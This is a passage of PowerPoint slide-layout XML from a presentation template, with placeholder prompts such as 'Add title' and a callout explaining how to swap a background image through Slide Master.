          <p:spPr>
            <a:xfrm>
              <a:off x="12061904" y="1520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BE172B"/>
            </a:solidFill>
            <a:ln w="6191"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F14425B1-15FF-4367-B235-AF4B487E6454}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12061904" y="2282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EF7721"/>
            </a:solidFill>
            <a:ln w="6191"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5A2E21AC-1D97-4320-B403-CEC21CCBCC89}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12061904" y="1901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DC0A34"/>
            </a:solidFill>
            <a:ln w="6191"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DDA2300-9120-4B99-9C1A-6EB500012861}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12061904" y="2663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EA5728"/>
            </a:solidFill>
            <a:ln w="6191"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DCBD1235-7E1C-41DC-A47C-34E6C75ABCB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12061904" y="4568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88133E"/>
            </a:solidFill>
            <a:ln w="6191"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46ADC9D7-9A83-40C0-894F-363AACBDE232}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12061904" y="5330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E8365C"/>
            </a:solidFill>
            <a:ln w="6191"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5C7991A2-0FD4-445F-9A6A-E9C09D9AF1FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12061904" y="4949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AF184C"/>
            </a:solidFill>
            <a:ln w="6191"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3CAEAAE3-6C13-42F0-AA1C-DB5A8EB2C8CD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12061904" y="5711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EB5A79"/>
            </a:solidFill>
            <a:ln w="6191"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3E373FE7-DCCD-4300-B608-563FB652E79D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12061904" y="6092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FFFFFF"/>
            </a:solidFill>
            <a:ln w="6191"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42108C68-A045-4F94-B6AB-F6908FC28282}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12061904" y="6473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5B4C4C"/>
            </a:solidFill>
            <a:ln w="6191" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15821957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vider image">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="tx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45ECA-5688-4A89-8C9A-A9AB33D211DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323038" y="1791348"/>
            <a:ext cx="5552892" cy="1745111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add divider title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7A7393E-2763-4FDE-8C90-450871B71FA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323038" y="3554388"/>
            <a:ext cx="5552892" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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subtitle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Callout: Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F155DD9-CB8B-4439-AE36-6FEB37836676}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="12856683" y="0"/>
            <a:ext cx="2038121" cy="4617720"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val 23170"/>
              <a:gd name="adj4" fmla="val -23198"/>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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How to change image</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Click on ‘View’ on the menu bar</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Choose ‘Slide Master’ </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Insert image and size to fit the page (make sure the coloured strip isn’t covered on the right hand side)</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Right click on the image and choose ‘send to back’</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 View ‘normal’ to exit Slide Master Mode</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1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93982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red">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452024-AB94-4C0E-BCE3-7CD7FB801B4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="12078" t="18689" r="9535" b="17057"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="996696" y="1341438"/>
            <a:ext cx="10415016" cy="4236402"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="971482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on pink">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent4"/>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C26AD0A-B2DA-4BA8-971E-89A9C370B04A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4149377" y="1520825"/>
            <a:ext cx="3893247" cy="3810079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F07637D6-1707-4810-803C-DDB9DD7B7824}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4781601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image">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="tx1">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452024-AB94-4C0E-BCE3-7CD7FB801B4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="12078" t="18689" r="9535" b="17057"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="996696" y="1341438"/>
            <a:ext cx="10415016" cy="4236402"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Callout: Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3359D9A-2124-40C4-8BC3-9E0A2A1A1FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="12856683" y="0"/>
            <a:ext cx="2038121" cy="4617720"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val 23170"/>
              <a:gd name="adj4" fmla="val -23198"/>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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How to change image</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Click on ‘View’ on the menu bar</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Choose ‘Slide Master’ </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Insert image and size to fit the page (make sure the coloured strip isn’t covered on the right hand side)</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Right click on the image and choose ‘send to back’</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 View ‘normal’ to exit Slide Master Mode</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1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04389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ogo on red_end">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent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C26AD0A-B2DA-4BA8-971E-89A9C370B04A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4149377" y="1520825"/>
            <a:ext cx="3893247" cy="3810079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4217809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9922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6965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p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22866089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5639" y="441325"/>
            <a:ext cx="11340000" cy="710639"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815D3A4F-C11A-480D-B249-1B3A0A517FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="355639" y="1213249"/>
            <a:ext cx="11340000" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2527195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p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38E95937-F466-4F58-B582-8721D3C9D23D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="1449388"/>
            <a:ext cx="11337925" cy="4679949"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr lang="en-GB" sz="1600" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add first level body copy</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8431596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content &amp; source/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p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38E95937-F466-4F58-B582-8721D3C9D23D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="1449388"/>
            <a:ext cx="11337925" cy="4400569"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="16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4" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BED2F0F8-4186-44B6-873A-D194D89C9C0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="6024283"/>
            <a:ext cx="11337924" cy="189230"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="900" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add footnote/source</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18355858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08"/>
            <a:ext cx="11337925" cy="710639"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815D3A4F-C11A-480D-B249-1B3A0A517FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="1213249"/>
            <a:ext cx="11337924" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFAFE8B-1D42-460B-875F-B063FE652E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="1628774"/>
            <a:ext cx="11337925" cy="4500563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
